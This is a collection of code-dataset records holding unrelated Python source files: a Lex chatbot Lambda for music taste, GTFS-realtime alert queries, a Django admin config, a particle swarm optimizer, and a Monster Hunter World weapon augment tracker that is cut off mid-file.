+{"seq_id":"30742502726","text":"# Created by jongwonkim on 07/07/2017.\n\n\nimport os\nimport logging\nimport json\nimport requests\nimport boto3\nimport time\nfrom src.dynamodb.intents import DbIntents\n\nlog = logging.getLogger()\nlog.setLevel(logging.DEBUG)\ndb_intents = DbIntents(os.environ['INTENTS_TABLE'])\nsns = boto3.client('sns')\n\n\ndef compose_validate_response(event):\n event['intents']['current_intent'] = 'AskTaste'\n print(\"!! compose validate !!\")\n print(event)\n\n artists = []\n if event['currentIntent']['slots']['Artist']:\n artists = event['currentIntent']['slots']['Artist'].strip().split(',')\n for artist in artists:\n if artist not in event['intents']['artists']:\n event['intents']['artists'].append(artist)\n\n genres = []\n if event['currentIntent']['slots']['Genre']:\n genres = event['currentIntent']['slots']['Genre'].strip().split(',')\n for genre in genres:\n if genre not in event['intents']['genres']:\n event['intents']['genres'].append(genre)\n\n if not event['currentIntent']['slots']['Artist'] and not event['currentIntent']['slots']['Genre']:\n if event['inputTranscript'] != 'THIS ASK TASTE INTENT SHOULD NOT BE INVOKED BY ANY UTTERANCES':\n check = requests.get(os.environ['BIT_ARTIST_URL'].format(event['inputTranscript'])).json()\n if 'errors' not in check:\n event['intents']['artists'].append(event['inputTranscript'])\n else:\n # publish SNS\n sns_event = {\n 'token': event['sessionAttributes']['bot_token'],\n 'channel': event['sessionAttributes']['channel_id'],\n 'text': \"I'm sorry, I'm having trouble finding that artist or genre :( Please check the spelling \"\n \"and try again.\"\n }\n sns.publish(\n TopicArn=os.environ['POST_MESSAGE_SNS_ARN'],\n Message=json.dumps({'default': json.dumps(sns_event)}),\n MessageStructure='json'\n )\n time.sleep(.5)\n # Check whether boths slots are empty.\n # If so, pass the whole string value to the API\n # If something returns, then manually store into artist.\n # If not, publish sns message \"I'm sorry, I couldn't understand that. Could you try again?\"\n\n # if event['currentIntent']['slots']['Artist'] and event['currentIntent']['slots']['Genre']:\n response = {'sessionAttributes': event['sessionAttributes'], 'dialogAction': {\n 'type': 'ConfirmIntent',\n \"intentName\": \"AskTaste\",\n 'slots': {\n 'Artist': None,\n 'Genre': None\n }\n }}\n # else:\n # response = {'sessionAttributes': event['sessionAttributes'], 'dialogAction': {\n # 'type': 'Delegate',\n # 'slots': {\n # 'Artist': event['currentIntent']['slots']['Artist'],\n # 'Genre': event['currentIntent']['slots']['Genre']\n # }\n # }}\n return response\n\n # if event['currentIntent']['slots']['Genre']:\n # genres = event['currentIntent']['slots']['Genre'].strip().split(',')\n # for genre in genres:\n # if genre not in event['intents']['genres']:\n # event['intents']['genres'].append(genre)\n # artist = None\n # if len(event['intents']['artists']) > 0:\n # artist = event['intents']['artists'][0]\n # # To keep getting genres and store in the db session.\n # response = {'sessionAttributes': event['sessionAttributes'], 'dialogAction': {\n # 'type': 'ConfirmIntent',\n # \"intentName\": \"AskTaste\",\n # 'slots': {\n # 'Artist': artist,\n # 'Genre': event['intents']['genres'][0]\n # }\n # }}\n # return response\n #\n # elif event['currentIntent']['slots']['Artist']:\n # artists = event['currentIntent']['slots']['Artist'].strip().split(',')\n # for artist in artists:\n # if artist not in event['intents']['artists']:\n # event['intents']['artists'].append(artist)\n # genre = None\n # if len(event['intents']['genres']) > 0:\n # genre = event['intents']['genres'][0]\n # # To keep getting artists and store in the db session.\n # response = {'sessionAttributes': event['sessionAttributes'], 'dialogAction': {\n # 'type': 'ConfirmIntent',\n # \"intentName\": \"AskTaste\",\n # 'slots': {\n # 'Artist': event['intents']['artists'][0],\n # 'Genre': genre\n # }\n # }}\n # return response\n #\n # else: # First time.\n #\n\n\n# End of the AskTaste intention moves to the CreateChannel intention.\ndef compose_fulfill_response(event):\n event['intents']['current_intent'] = 'AskCity'\n response = {\n 'sessionAttributes': event['sessionAttributes'],\n 'dialogAction': {\n 'type': 'ElicitSlot',\n 'intentName': 'AskCity',\n 'slotToElicit': 'City',\n 'slots': {\n 'City': None\n },\n }\n }\n return response\n\n\ndef retrieve_intents(event):\n if 'sessionAttributes' not in event:\n raise Exception('Required keys: `team_id` and `channel_id` are not provided.')\n event['intents'] = db_intents.retrieve_intents(\n event['sessionAttributes']['team_id'],\n event['sessionAttributes']['channel_id']\n )\n\n\ndef store_intents(event):\n return db_intents.store_intents(\n keys={\n 'team_id': event['sessionAttributes']['team_id'],\n 'channel_id': event['sessionAttributes']['channel_id']\n },\n attributes=event['intents']\n )\n\n\ndef handler(event, context):\n log.info(json.dumps(event))\n response = {\n \"statusCode\": 200\n }\n try:\n retrieve_intents(event)\n if event['currentIntent'] is not None and event['currentIntent']['confirmationStatus'] == 'Denied' and event[\n 'inputTranscript'].lower() in ['no', 'no thanks', 'nope', 'nah']: # TODO determine if proper strategy\n # Terminating condition.\n print(\"!!!! TERMINATOR !!!!\")\n print(event)\n response = compose_fulfill_response(event)\n else:\n # Processing the user input.\n response = compose_validate_response(event)\n store_intents(event)\n except Exception as e:\n response = {\n \"statusCode\": 400,\n \"body\": json.dumps({\"message\": str(e)})\n }\n finally:\n log.info(response)\n return response\n","repo_name":"MyMusicTaste/my-music-mate","sub_path":"src/lex/lambda/ask-taste.py","file_name":"ask-taste.py","file_ext":"py","file_size_in_byte":6640,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"70148387114","text":"from ott.gtfsdb_realtime.model.alert_entity import AlertEntity\n\nfrom .base import Base\n\nimport datetime\nimport logging\nlogging.basicConfig(level=logging.INFO)\nlog = logging.getLogger(__file__)\n\n\nclass AlertQueries(Base):\n\n # static vals (which can be over-ridden on a class / instance level) to be used by the sort routine\n filter_future = False\n filter_past = True\n inverse_sort = True\n\n @classmethod\n def query_via_route_id(cls, session, route_id, agency_id=None, limit=None):\n return cls._base_query(session, AlertEntity, route_id, None, agency_id, limit)\n\n @classmethod\n def query_via_stop_id(cls, session, stop_id, agency_id=None, limit=None):\n return cls._base_query(session, AlertEntity, None, stop_id, agency_id, limit)\n\n @classmethod\n def query_all(cls, session, agency_id=None, limit=None):\n return cls._base_query(session, AlertEntity, None, None, agency_id, limit)\n\n @classmethod\n def unique_sort(cls, alert_entity_list):\n \"\"\"\n de-duplicate and sort alerts from an entity list\n \"\"\"\n ret_val = []\n\n # step 1: sort for unique alerts (and also sort past / future, if specified)\n alert_hash = {}\n now = datetime.datetime.now()\n for e in alert_entity_list:\n if cls.filter_past and e.end < now: continue\n if cls.filter_future and e.begin > now: continue\n alert_hash[e.alert_id] = e.alert\n\n # step 2: sort trips\n ret_val = alert_hash.values()\n # ret_val.sort(key=lambda x: x.start, reverse=reverse_sort)\n return ret_val\n\n @classmethod\n def print_alert(cls, index=\"\", alert=None):\n print(\"{}: {}\".format(index, alert.description_text))\n\n\ndef alerts_command_line():\n \"\"\"\n command line query of vehicles.\n example:\n bin/gtfsrt-alerts-cmd -d loc -s trimet -l 7\n \"\"\"\n from ott.utils.parse.cmdline import db_cmdline\n from ott.utils.parse.cmdline import gtfs_cmdline\n from .base import get_session_via_cmdline\n\n parser = db_cmdline.db_parser('bin/gtfsrt-alerts-cmd')\n gtfs_cmdline.simple_stop_route_parser(parser)\n session = get_session_via_cmdline(args)\n\n ## NOTE: fun little test of casting a Base class in an object to a child\n a = Base()\n a.__class__ = AlertQueries\n a.inverse_sort = False\n print(a.inverse_sort, AlertQueries.inverse_sort)\n\n # import pdb; pdb.set_trace()\n msg = \"VIA\"\n if args.route_id or args.stop_id:\n ae = []\n se = []\n if args.route_id:\n msg += \" ROUTES\"\n ae = a.query_via_route_id(session, args.route_id, limit=args.limit)\n if args.stop_id:\n msg += \" STOPS\"\n se = a.query_via_stop_id(session, args.stop_id, limit=args.limit)\n entities = ae + se\n else:\n msg = \"ALL\"\n entities = a.query_all(session, limit=args.limit)\n\n print(\"\\n\\n{} ALERTS:\".format(msg))\n for i, e in enumerate(entities):\n a.print_alert(i+1, e.alert)\n print(\"\\n\")\n","repo_name":"OpenTransitTools/gtfsdb_realtime","sub_path":"ott/gtfsdb_realtime/control/alert_queries.py","file_name":"alert_queries.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"28935613588","text":"from django.contrib import admin\n\n# Register your models here.\n\nfrom .models import BookInfo, HeroInfo\n\n\nclass HeroInfoInline(admin.StackedInline):\n model = HeroInfo\n extra = 2\n # 这个数字表示在添加BookInfo的时候会列出1个表单让填写HeroInfo\n # 继承StackedInline表示显示的添加表单形式是stack形式的,还有TabularInline\n\n\nclass BookInfoAdmin(admin.ModelAdmin):\n # 自定义model的管理页面\n list_display = ['id', 'btitle', 'bpub_date']\n list_filter = ['id', 'btitle', 'bpub_date']\n search_fields = ['btitle']\n fields = ['bpub_date', 'btitle']\n list_per_page = 10\n\n actions_on_top = True\n # actions_on_bottom = True\n\n inlines = [HeroInfoInline]\n\n\nclass HeroInfoAdmin(admin.ModelAdmin):\n list_display = ['id', 'hname', 'hgender', 'book', 'content']\n search_fields = ['hname']\n\n\nadmin.site.register(BookInfo, BookInfoAdmin)\nadmin.site.register(HeroInfo, HeroInfoAdmin)\n\n# admin使用总结:\n# 1. 添加管理员账户\n# 2. 使用admin注册Model类(如需自定义展示页面则可以自定义类继承admin.ModelAdmin)\n","repo_name":"Mrfranken/djangostudying","sub_path":"test1/bootest/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"5565159901","text":"from PyQt5.QtCore import pyqtSignal, pyqtSlot, QThread\nimport numpy as np\nimport random\nimport math\nimport copy\nfrom particle import Particle\nfrom IPython import embed\n\nclass PSO(QThread):\n sig_train_detail = pyqtSignal(int, float, float, float)\n def __init__(self, train_data, iter_times, population_len, mean_range, inertia_weight, social_weight, cognitive_weight, rbfn):\n super().__init__()\n self.train_data = train_data\n self.iter_times = iter_times\n self.population_len = population_len\n self.optimized = rbfn\n\n self.inertia_weight = inertia_weight\n self.social_weight = social_weight\n self.cognitive_weight = cognitive_weight\n\n self.dev_max = rbfn.dev_max\n self.m_range = mean_range\n self.num_rbfn_neuron = self.optimized.num_neuron\n self.data_dim = self.optimized.data_dim\n self.population = []\n\n self.exit = False\n\n def run(self):\n for _ in range(self.population_len):\n self.population.append(Particle(self.m_range, self.data_dim, self.num_rbfn_neuron, self.dev_max, self.optimized, self.train_data))\n min_err = math.inf\n self.best_individual = copy.deepcopy(self.population[0])\n self.g_best = self.best_individual\n for t in range(self.iter_times):\n if self.exit:\n break\n self.update_best_fitness()\n min_err = self.best_individual.fitness\n self.sig_train_detail.emit(t+1, min_err, self.g_best.fitness, self.avg_err)\n\n for individual in self.population:\n individual.update_position(self.inertia_weight, self.cognitive_weight, self.social_weight, self.best_individual.position)\n\n self.update_best_fitness()\n self.sig_train_detail.emit(t+1, min_err, self.g_best.fitness, self.avg_err)\n \n self.optimized.update_parameters(self.best_individual.position)\n\n def update_best_fitness(self):\n sum_err = 0\n for individual in self.population:\n sum_err += individual.update_fitness()\n self.g_best = min(self.g_best, individual, key = lambda x: x.fitness)\n self.avg_err = sum_err/self.population_len\n if self.best_individual.fitness > self.g_best.fitness:\n self.best_individual = copy.deepcopy(self.g_best)\n @pyqtSlot()\n def stop(self):\n self.exit = True","repo_name":"tsaooo/PSO_RBFN_Car","sub_path":"pso.py","file_name":"pso.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"17014292350","text":"# -*- coding: ascii -*-\n\n\"\"\"\nFilename: query_weapons.py\nAuthor: contact@simshadows.com\n\nThis file provides the MHWI build optimizer script's weapon database queries.\n\"\"\"\n\nimport json\nimport logging\nfrom abc import ABC, abstractmethod\nfrom collections import namedtuple\nfrom itertools import accumulate, product, zip_longest\nfrom enum import Enum, auto\nfrom copy import copy\n\nfrom .utils import prune_by_superceding\nfrom .loggingutils import ExecutionProgress, dump_pruned_weapon_combos\n\nfrom .database_skills import SetBonus\n\nfrom .database_weapons import (SHARPNESS_LEVEL_NAMES,\n MaximumSharpness,\n WeaponAugmentationScheme,\n WeaponUpgradeScheme,\n weapon_db)\n\n\nlogger = logging.getLogger(__name__)\n\n\nWeaponAugmentsContribution = namedtuple(\n \"WeaponAugmentsContribution\",\n [\n \"added_attack_power\",\n \"added_raw_affinity\",\n \"extra_decoration_slot_level\",\n ],\n)\nclass WeaponAugmentTracker(ABC):\n\n @classmethod\n def get_instance(cls, weapon):\n #assert isinstance(weapon, namedtuple) # TODO: Make a proper assertion.\n if weapon.augmentation_scheme is WeaponAugmentationScheme.ICEBORNE:\n return IBWeaponAugmentTracker(weapon.rarity)\n elif weapon.augmentation_scheme is WeaponAugmentationScheme.NONE:\n return NoWeaponAugments()\n else:\n raise RuntimeError(f\"Augmentation scheme {weapon.augmentation_scheme} not supported.\")\n\n @classmethod\n def get_maximized_trackers(cls, weapon, *, health_regen_minimum):\n trackers = []\n\n bare_tracker = cls.get_instance(weapon)\n for config_obj in bare_tracker.get_maximized_configs(health_regen_minimum=health_regen_minimum):\n tracker = cls.get_instance(weapon)\n tracker.update_with_config(config_obj)\n trackers.append(tracker)\n\n return trackers\n\n # TODO: Use something better, like the __copy__() method.\n @abstractmethod\n def copy(self):\n raise NotImplementedError\n\n # Outputs some arbitrary structure.\n #\n # This function is only really intended for diagnostic purposes for now, but will be given more important roles\n # later. I'll properly define the structure then.\n @abstractmethod\n def get_config(self):\n raise NotImplementedError\n\n # Similar to get_config(), but this returns an arbitrary string that the class can read to restore to the same augments.\n @abstractmethod\n def get_serialized_config(self):\n raise NotImplementedError\n\n # Gives back a WeaponAugmentsContribution namedtuple with all the values the current\n # set of augments contributes to the build.\n @abstractmethod\n def calculate_contribution(self):\n raise NotImplementedError\n\n # Gives back a list of arbitrary things describing all the possible maximum configurations.\n # You can pass one of these things to update_with_config.\n #\n # health_regen_minimum is the minimum level we need it to be.\n @abstractmethod\n def get_maximized_configs(self, health_regen_minimum=0):\n raise NotImplementedError\n\n # Set the config to the selected config.\n @abstractmethod\n def update_with_config(self, selected_config):\n raise NotImplementedError\n\n # Similar to update_with_config(), but you get a string returned by get_serialized_config().\n @abstractmethod\n def update_with_serialized_config(self, serialized_config):\n raise NotImplementedError\n\n # Returns a one-line string that represents the state of the tracker.\n # Mostly targeted for debugging purposes.\n @abstractmethod\n def to_str_debugging(self):\n raise NotImplementedError\n\n\nclass NoWeaponAugments(WeaponAugmentTracker):\n\n MAGIC_WORD = \"NoWeaponAugments\"\n\n def copy(self):\n return self # It shouldn't matter at all\n\n def get_config(self):\n return []\n\n def get_serialized_config(self):\n return self.MAGIC_WORD\n\n def calculate_contribution(self):\n ret = WeaponAugmentsContribution (\n added_attack_power = 0,\n added_raw_affinity = 0,\n extra_decoration_slot_level = 0,\n )\n return ret\n\n def get_maximized_configs(self, health_regen_minimum=0):\n if health_regen_minimum > 0:\n return []\n else:\n return None # Not possible to add health regen.\n\n def update_with_config(self, selected_config):\n raise RuntimeError(\"Can't update the augments of a weapon that can't be augmented.\")\n\n def update_with_serialized_config(self, serialized_config):\n assert serialized_config == self.MAGIC_WORD\n return\n\n def to_str_debugging(self):\n return \"Cannot augment this weapon.\"\n\n\nclass IBWeaponAugmentType(Enum):\n AUGMENT_LEVEL = auto() # This one's not really an augment.\n\n ATTACK_INCREASE = auto()\n AFFINITY_INCREASE = auto()\n #DEFENSE_INCREASE = auto() # I'm just gonna pretend these don't exist yet...\n SLOT_UPGRADE = auto()\n HEALTH_REGEN = auto()\n #ELEMENT_STATUS_EFFECT_UP = auto()\n\nclass IBWeaponAugmentTracker(WeaponAugmentTracker):\n\n __slots__ = [\n \"auto_maximize\",\n \"_rarity\",\n \"_aug_level\",\n \"_augments\",\n ]\n\n IB_AUGMENTATION_SLOTS = {\n 10: [5, 7, 9, 10],\n 11: [4, 5, 6, 8 ],\n 12: [3, 4, 5, 6 ],\n # 0 1 2 3 = slot level\n }\n\n IB_SLOT_CONSUMPTIONS = {\n IBWeaponAugmentType.ATTACK_INCREASE : [3, 2, 2, 2],\n IBWeaponAugmentType.AFFINITY_INCREASE : [2, 2, 2, 2],\n #IBWeaponAugmentType.DEFENSE_INCREASE : [1, 1, 1, 2],\n IBWeaponAugmentType.SLOT_UPGRADE : [3, 3, 1, 1],\n IBWeaponAugmentType.HEALTH_REGEN : [3, 2, 2, 2],\n #IBWeaponAugmentType.ELEMENT_STATUS_EFFECT_UP : [1, 2, 2, 2],\n }\n\n _IB_MAX_SLOT_LEVEL = 3 # This determines the maximum slot level, i.e. length of each IB_AUGMENTATION_SLOTS list.\n _IB_AUGMENT_MAX_LEVEL = 4 # This determines the maximum level of each of the IBWeaponAugmentTypes.\n\n IB_ATTACK_AUGMENT_VALUES = (0, 5, 5, 5, 5)\n IB_AFFINITY_AUGMENT_VALUES_PERCENTAGES = (0, 10, 5, 5, 5)\n # level = 0 1 2 3 4\n\n IB_SLOT_CONSUMPTIONS_CUMULATIVE = {k: list(accumulate(v)) for (k, v) in IB_SLOT_CONSUMPTIONS.items()}\n\n IB_ATTACK_AUGMENT_CUMULATIVE = tuple(accumulate(IB_ATTACK_AUGMENT_VALUES))\n IB_AFFINITY_AUGMENT_PERCENTAGES_CUMULATIVE = tuple(accumulate(IB_AFFINITY_AUGMENT_VALUES_PERCENTAGES))\n\n def __init__(self, rarity, auto_maximize=True):\n assert isinstance(rarity, int)\n assert isinstance(auto_maximize, bool)\n\n if auto_maximize == False:\n raise NotImplementedError(\"Only works with auto-maximize on for now.\")\n # To implement auto_maximize==False, we'd need to actually allow lower augment levels.\n\n self._auto_maximize = auto_maximize\n\n self._rarity = rarity\n self._aug_level = self._IB_MAX_SLOT_LEVEL\n self._augments = {} # {IBWeaponAugmentType: int}\n\n assert self._state_is_valid()\n return\n\n def copy(self):\n new = copy(self)\n new._augments = copy(self._augments)\n assert new._state_is_valid()\n return new\n\n def get_config(self):\n return list(self._augments.items())\n\n def get_serialized_config(self):\n augments = {k.name: v for (k, v) in self._augments.items()}\n\n data = {\n \"rarity\": self._rarity,\n \"aug_level\": self._aug_level,\n \"augments\": augments,\n }\n serialized_data = json.dumps(data)\n assert isinstance(serialized_data, str)\n return serialized_data\n\n def calculate_contribution(self):\n attack_level = self._augments.get(IBWeaponAugmentType.ATTACK_INCREASE, 0)\n affinity_level = self._augments.get(IBWeaponAugmentType.AFFINITY_INCREASE, 0)\n decoration_slot_level = self._augments.get(IBWeaponAugmentType.SLOT_UPGRADE, 0)\n\n ret = WeaponAugmentsContribution (\n added_attack_power = \\\n self.IB_ATTACK_AUGMENT_CUMULATIVE[attack_level],\n added_raw_affinity = \\\n self.IB_AFFINITY_AUGMENT_PERCENTAGES_CUMULATIVE[affinity_level],\n extra_decoration_slot_level = \\\n decoration_slot_level,\n )\n return ret\n\n def get_maximized_configs(self, health_regen_minimum=0):\n maximized_configs = []\n \n efr_augments = {\n IBWeaponAugmentType.ATTACK_INCREASE,\n IBWeaponAugmentType.AFFINITY_INCREASE,\n IBWeaponAugmentType.SLOT_UPGRADE,\n }\n\n picks = [[(aug, x) for x in range(self._IB_AUGMENT_MAX_LEVEL + 1)] for aug in efr_augments]\n # range() will go from 0 to 4. 0 will mean no augment, and 1-4 will be each level.\n\n for augs in product(*picks):\n config = [(aug, level) for (aug, level) in augs if (level > 0)]\n\n assert IBWeaponAugmentType.HEALTH_REGEN not in set(x for (x, _) in config) # Assume it's not in yet.\n if health_regen_minimum > 0:\n config.append((IBWeaponAugmentType.HEALTH_REGEN, health_regen_minimum))\n\n if self._is_valid_configuration(config, self._rarity, self._aug_level):\n maximized_configs.append(config)\n\n return maximized_configs\n\n def update_with_config(self, selected_config):\n assert isinstance(selected_config, list) # May accept dicts later.\n #assert (selected_config in self.get_maximized_configs()) or (len(selected_config) == 0) # Fails if our config isn't maximized\n assert all((level >= 0) and (level <= 4) for (augment, level) in selected_config)\n\n self._augments = {augment: level for (augment, level) in selected_config}\n\n assert len(self._augments) == len(selected_config) # Quick check if we have any duplicates.\n assert self._state_is_valid() # If our config breaks anything, it should be caught here\n return\n\n def update_with_serialized_config(self, serialized_config):\n assert isinstance(serialized_config, str)\n\n data = json.loads(serialized_config)\n \n # We check that we're updating the right tracker.\n assert self._rarity == data[\"rarity\"]\n assert self._aug_level == data[\"aug_level\"]\n\n self._augments = {IBWeaponAugmentType[k]: v for (k, v) in data[\"augments\"].items()}\n \n assert self._state_is_valid()\n return\n\n def to_str_debugging(self):\n return f\"[Augmentation Level: {self._aug_level}] \" + \",\".join(f\"{k.name}_{v}\" for (k, v) in self._augments.items())\n\n def _state_is_valid(self):\n config_list = list(self._augments.items())\n\n ret = all(isinstance(k, IBWeaponAugmentType) and isinstance(v, int) for (k, v) in self._augments.items()) \\\n and all((v >= 0) and (v <= 4) for (k, v) in self._augments.items()) \\\n and (IBWeaponAugmentType.AUGMENT_LEVEL not in self._augments.items()) \\\n and self._is_valid_configuration(config_list, self._rarity, self._aug_level)\n return ret\n\n @classmethod\n def _is_valid_configuration(cls, config_list, rarity, aug_level):\n assert isinstance(config_list, list)\n assert all(isinstance(aug, IBWeaponAugmentType) and isinstance(level, int) for (aug, level) in config_list)\n assert all((level >= 0) and (level <= cls._IB_AUGMENT_MAX_LEVEL) for (_, level) in config_list)\n assert len(config_list) == len(set(x for (x, _) in config_list))\n\n slots_maximum = cls.IB_AUGMENTATION_SLOTS[rarity][aug_level]\n\n slots_used = 0\n for (aug, level) in config_list:\n if level > 0:\n slots_used += cls.IB_SLOT_CONSUMPTIONS_CUMULATIVE[aug][level - 1]\n # IMPORTANT: Need to remember that the slot consumptions list starts at level 1.\n if slots_used <= slots_maximum:\n return True\n else:\n return False\n\n\nWeaponUpgradesContribution = namedtuple(\n \"WeaponUpgradesContribution\",\n [\n \"added_attack_power\",\n \"added_raw_affinity\",\n \"extra_decoration_slot_level\",\n \"new_max_sharpness_values\",\n \"set_bonus\",\n ],\n)\nclass WeaponUpgradeTracker(ABC):\n\n @classmethod\n def get_instance(cls, weapon):\n #assert isinstance(weapon, namedtuple) # TODO: Make a proper assertion.\n if weapon.upgrade_scheme is WeaponUpgradeScheme.ICEBORNE_COMMON:\n return IBCWeaponUpgradeTracker()\n elif weapon.upgrade_scheme is WeaponUpgradeScheme.SAFI_STANDARD:\n return SafiWeaponUpgrades()\n elif weapon.upgrade_scheme is WeaponUpgradeScheme.NONE:\n return NoWeaponUpgrades()\n else:\n raise RuntimeError(f\"Upgrade scheme {weapon.upgrade_scheme} not supported.\")\n\n # TODO: Consider pruning configurations that are clearly inferior, rather than just pruning\n # configurations that have unique contributions.\n @classmethod\n def get_maximized_trackers_pruned(cls, weapon):\n trackers = []\n seen_tracker_contributions = set()\n\n bare_tracker = cls.get_instance(weapon)\n for config_obj in bare_tracker.get_maximized_configs():\n tracker = cls.get_instance(weapon)\n tracker.update_with_config(config_obj)\n\n contribution = tracker.calculate_contribution()\n if contribution not in seen_tracker_contributions:\n seen_tracker_contributions.add(contribution)\n trackers.append(tracker)\n\n return trackers\n\n # TODO: Use something better, like the __copy__() method.\n @abstractmethod\n def copy(self):\n raise NotImplementedError\n\n # Similar to WeaponAugmentTracker\n @abstractmethod\n def get_config(self):\n raise NotImplementedError\n\n # Similar to WeaponAugmentTracker\n @abstractmethod\n def get_serialized_config(self):\n raise NotImplementedError\n\n # Similar to WeaponAugmentTracker\n @abstractmethod\n def calculate_contribution(self):\n raise NotImplementedError\n\n # Similar to WeaponAugmentTracker\n @abstractmethod\n def get_maximized_configs(self):\n raise NotImplementedError\n\n # Similar to WeaponAugmentTracker\n @abstractmethod\n def update_with_config(self, selected_config):\n raise NotImplementedError\n\n # Similar to WeaponAugmentTracker\n @abstractmethod\n def update_with_serialized_config(self, serialized_config):\n raise NotImplementedError\n\n # Similar to WeaponAugmentTracker\n @abstractmethod\n def to_str_debugging(self):\n raise NotImplementedError\n\n\nclass NoWeaponUpgrades(WeaponUpgradeTracker):\n\n MAGIC_WORD = \"NoWeaponUpgrades\"\n\n def copy(self):\n return self # It shouldn't matter at all\n\n def get_config(self):\n return []\n\n def get_serialized_config(self):\n return self.MAGIC_WORD\n\n def calculate_contribution(self):\n ret = WeaponUpgradesContribution (\n added_attack_power = 0,\n added_raw_affinity = 0,\n extra_decoration_slot_level = 0,\n new_max_sharpness_values = None,\n set_bonus = None,\n )\n return ret\n\n def get_maximized_configs(self):\n return [None]\n\n def update_with_config(self, selected_config):\n if selected_config is not None:\n raise RuntimeError(\"Can't update the upgrades of a weapon that can't be upgraded.\")\n return\n\n def update_with_serialized_config(self, serialized_config):\n assert serialized_config == self.MAGIC_WORD\n\n def to_str_debugging(self):\n return \"Cannot upgrade this weapon.\"\n\n\nclass IBCWeaponUpgradeType(Enum):\n ATTACK = auto()\n AFFINITY = auto()\n #ELEMENTAL_STATUS = auto() # I'm just gonna pretend these don't exist yet...\n #DEFENSE = auto()\n\n\nclass IBCWeaponUpgradeTracker(WeaponUpgradeTracker):\n\n __slots__ = [\n \"_upgrades\",\n ]\n\n _IB_ATTACK_UPGRADE_VALUES = (1, 1, 1, 1, 1, 1 , 2)\n _IB_AFFINITY_UPGRADE_VALUES = (1, 1, 1, 1, 1, None, 3)\n # level = 1 2 3 4 5 6 7\n\n _m1 = [\n [IBCWeaponUpgradeType.ATTACK] * 6,\n ([IBCWeaponUpgradeType.AFFINITY] * 1) + ([IBCWeaponUpgradeType.ATTACK] * 5),\n ([IBCWeaponUpgradeType.AFFINITY] * 2) + ([IBCWeaponUpgradeType.ATTACK] * 4),\n ([IBCWeaponUpgradeType.AFFINITY] * 3) + ([IBCWeaponUpgradeType.ATTACK] * 3),\n ([IBCWeaponUpgradeType.AFFINITY] * 4) + ([IBCWeaponUpgradeType.ATTACK] * 2),\n ([IBCWeaponUpgradeType.AFFINITY] * 5) + ([IBCWeaponUpgradeType.ATTACK] * 1),\n ]\n _m2 = [\n [IBCWeaponUpgradeType.ATTACK],\n [IBCWeaponUpgradeType.AFFINITY],\n ]\n\n # TODO: Consider automating this definition better.\n _MAXIMIZED_CONFIGS = [(x + y) for (x, y) in product(_m1, _m2)]\n\n def __init__(self):\n self._upgrades = []\n assert self._state_is_valid()\n return\n\n def copy(self):\n new = copy(self)\n new._upgrades = copy(self._upgrades)\n assert new._state_is_valid()\n return new\n\n def get_config(self):\n return copy(self._upgrades)\n\n def get_serialized_config(self):\n upgrades_strs = [(x.name if (x is not None) else None) for x in self._upgrades]\n\n serialized_data = json.dumps(upgrades_strs)\n assert isinstance(serialized_data, str)\n return serialized_data\n\n def calculate_contribution(self):\n # IMPORTANT: We're actually mostly just relying on this function for debugging.\n # If this function doesn't raise an exception, then we're good.\n added_attack_power = 0\n added_raw_affinity = 0\n for (i, upgrade) in enumerate(self._upgrades):\n assert i < len(self._IB_ATTACK_UPGRADE_VALUES)\n if upgrade is IBCWeaponUpgradeType.ATTACK:\n added_attack_power += self._IB_ATTACK_UPGRADE_VALUES[i]\n elif upgrade is IBCWeaponUpgradeType.AFFINITY:\n added_raw_affinity += self._IB_AFFINITY_UPGRADE_VALUES[i]\n else:\n raise RuntimeError(\"Unsupported upgrade type found: \" + str(type(upgrade)))\n\n ret = WeaponUpgradesContribution (\n added_attack_power = added_attack_power,\n added_raw_affinity = added_raw_affinity,\n extra_decoration_slot_level = 0,\n new_max_sharpness_values = None,\n set_bonus = None,\n )\n return ret\n\n def get_maximized_configs(self):\n return self._MAXIMIZED_CONFIGS\n\n def update_with_config(self, selected_config):\n if selected_config is None:\n self._upgrades = []\n else:\n assert isinstance(selected_config, list)\n self._upgrades = selected_config\n assert self._state_is_valid()\n return\n\n def update_with_serialized_config(self, serialized_config):\n assert isinstance(serialized_config, str)\n\n upgrades_strs = json.loads(serialized_config)\n \n assert isinstance(upgrades_strs, list)\n\n self._upgrades = [(IBCWeaponUpgradeType[x] if (x is not None) else None) for x in upgrades_strs]\n \n assert self._state_is_valid()\n return\n\n def to_str_debugging(self):\n return \",\".join(x.name for x in self._upgrades)\n\n def _state_is_valid(self):\n # We generally just rely on calculate_contribution() to raise exceptions when something's wrong.\n return (len(self._upgrades) <= 7)\n\n\nclass SafiWeaponStandardUpgradeType(Enum):\n ATTACK = auto()\n AFFINITY = auto()\n #STATUS = auto() # Will implement later.\n #ELEMENT = auto() # Will implement later.\n #DEFENSE = auto() # Will implement later.\n SLOT = auto()\n SHARPNESS = auto()\n\nSafiWeaponSetBonusUpgradeTypeInfo = namedtuple(\"SafiWeaponSetBonusUpgradeTypeInfo\", [\"upgrade_name\", \"set_bonus_name\"])\nclass SafiWeaponSetBonusUpgradeType(Enum):\n TEOSTRA_ESSENCE = SafiWeaponSetBonusUpgradeTypeInfo(\"Teostra Essence\", \"TEOSTRA_TECHNIQUE\")\n TIGREX_ESSENCE = SafiWeaponSetBonusUpgradeTypeInfo(\"Tigrex Essence\", \"TIGREX_ESSENCE\")\n VELKHANA_ESSENCE = SafiWeaponSetBonusUpgradeTypeInfo(\"Velkhana Essence\", \"VELKHANA_DIVINITY\")\n # I'll add the others as I fill the database!\n\nclass SafiWeaponUpgrades(WeaponUpgradeTracker):\n\n __slots__ = [\n \"_config\",\n ]\n\n # TODO: These values are true for GS according to honeyhunterworld.com. What about other weapons?\n # level = 1 2 3 4 5 6\n _ATTACK_VALUES = (None, None, None, 7, 9, 14) # Raw added to the weapon raw. Other levels not yet implemented.\n _AFFINITY_VALUES = (None, None, None, 8, 10, 15) # Added affinity percentage. Other levels not yet implemented.\n _SLOT_VALUES = (None, None, 1, 2, 3, 4 ) # The level of the slot. Slot I and II don't exist.\n _SHARPNESS_VALUES = (None, None, None, 40, 50, 70) # Sharpness value added. Other levels not 